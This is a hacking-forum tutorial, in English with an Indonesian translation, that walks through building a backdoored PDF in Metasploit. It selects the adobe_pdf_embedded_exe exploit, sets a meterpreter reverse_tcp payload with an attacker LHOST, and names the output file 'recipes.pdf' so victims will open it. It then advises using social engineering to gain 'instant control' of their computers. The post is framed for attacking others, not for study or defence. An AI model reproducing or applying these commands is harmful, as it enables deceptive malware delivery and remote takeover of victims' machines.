Hacking
1091

Embed Backdoor in Pdf Metasploit






  16-Aug-2020 16:24:46



♨️How to Embed a backdoor in a PDF file♨️



Step 1)Run Metasploit


Step2) Find the Appropriate Exploit.


I will search metasploits database for an exploit for adobe pdf on windows, using this command:


●Code:msf > search type:exploit platform:windows adobe pdf


You should see the exploit "exploit/windows/fileformat/adobe_pdf_embedded_exe", which we will use:


●Code:msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe


Step 3) Set the Payload


I will use the meterpreter payload again, because it is one of the most powerful payloads available to us:


●Code:msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp


Step 4) Set the exploit options


First, display the required options for the exploit:


●Code:msf > exploit (adobe_pdf_embedded_exe) > show options


You can see that we must provide an existing PDF file to the INFILENAME option in which to embed the meterpreter payload. I will call it "hemantexample.pdf":


●Code: msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME example.pdf


The next option is the output file name, FILENAME. Change this to something innocent that will attract users to open it:

msf > exploit (adobe_pdf_embedded_exe) > set FILENAME recipes.pdf


Finally, we need to specify the LHOST, which is our (the attackers) IP address. Mine is 192.168.1.8:


●Code:msf > exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.1.8


Step5) Run the Exploit.


Now that all the options are set, we can run the exploit like this:


●Code: msf > exploit (adobe_pdf_embedded_exe) > exploit


Metasploit has created a PDF named recipes.pdf that contains the Meterpeter listener. Now, simply get users to open the pdf (Social Engineering again), and you will get instant control of their computer easy as fucking smile :)



Thanks for reading, please reply with your thanks if you enjoyed this 😊😊


🔥Share & Support us🔥 

*Beware click the link!


DISCUSSION

♨️ Cara Menyematkan pintu belakang di file PDF♨️



Langkah 1) Jalankan Metasploit


Step2) Temukan Eksploitasi yang Sesuai.


Saya akan mencari database metasploits untuk mengeksploitasi adobe pdf di windows, menggunakan perintah ini:


● Kode: msf> jenis pencarian: exploit platform: windows adobe pdf


Anda akan melihat exploit "exploit / windows / fileformat / adobe_pdf_embedded_exe", yang akan kami gunakan:


● Kode: msf> gunakan exploit / windows / fileformat / adobe_pdf_embedded_exe


Langkah 3) Atur Payload


Saya akan menggunakan payload meterpreter lagi, karena ini adalah salah satu payload paling kuat yang tersedia bagi kami:


● Kode: msf> exploit (adobe_pdf_embedded_exe)> setel jendela muatan / meterpreter / reverse_tcp


Langkah 4) Atur opsi eksploitasi


Pertama, tampilkan opsi yang diperlukan untuk eksploit:


● Code: msf> exploit (adobe_pdf_embedded_exe)> tampilkan opsi


Anda dapat melihat bahwa kami harus menyediakan file PDF yang ada ke opsi INFILENAME untuk menyematkan payload pengukur. Saya akan menyebutnya "hemantexample.pdf":


● Kode: msf> eksploitasi (adobe_pdf_embedded_exe)> setel INFILENAME example.pdf


Opsi berikutnya adalah nama file keluaran, NAMA FILE. Ubah ini menjadi sesuatu yang tidak berbahaya yang akan menarik pengguna untuk membukanya:

msf> eksploitasi (adobe_pdf_embedded_exe)> setel FILENAME recipes.pdf


Terakhir, kita perlu menentukan LHOST, yang merupakan alamat IP (penyerang) kita. Milik saya adalah 192.168.1.8:


● Kode: msf> exploit (adobe_pdf_embedded_exe)> setel LHOST 192.168.1.8


Step5) Jalankan Eksploitasi.


Sekarang semua opsi telah ditetapkan, kita dapat menjalankan exploit seperti ini:


● Kode: msf> exploit (adobe_pdf_embedded_exe)> exploit


Metasploit telah membuat PDF bernama recipes.pdf yang berisi listener Meterpeter. Sekarang, cukup minta pengguna untuk membuka pdf (Rekayasa Sosial lagi), dan Anda akan mendapatkan kontrol instan atas komputer mereka semudah tersenyum :)



Terima kasih telah membaca, balas dengan ucapan terima kasih Anda jika Anda menikmati ini 😊😊


🔥 Bagikan & Dukung kami🔥




Reply

Login for report, comment and join discussion
Login Here
Sponsored

Popular Posts
Gps Tracker Seccodeid Free Too...
General
21861
208
Top


Djie sam soe Djie sam soe
Complete Basic Course in Kali...
Linux
14738
4
Top


Djie sam soe Djie sam soe
Free Proxy List
Networking
3726
3
Top


Sandidi Sandidi
Need ida pro crack anyone have...
Reverse Engineering
2492
29
Top


Member Seccodeid Rei
Xampp msyql error cant running
Web Development
2351
25
Top


Karno si kribo Karno si kribo

Related Post

Youtube Video

Subscribe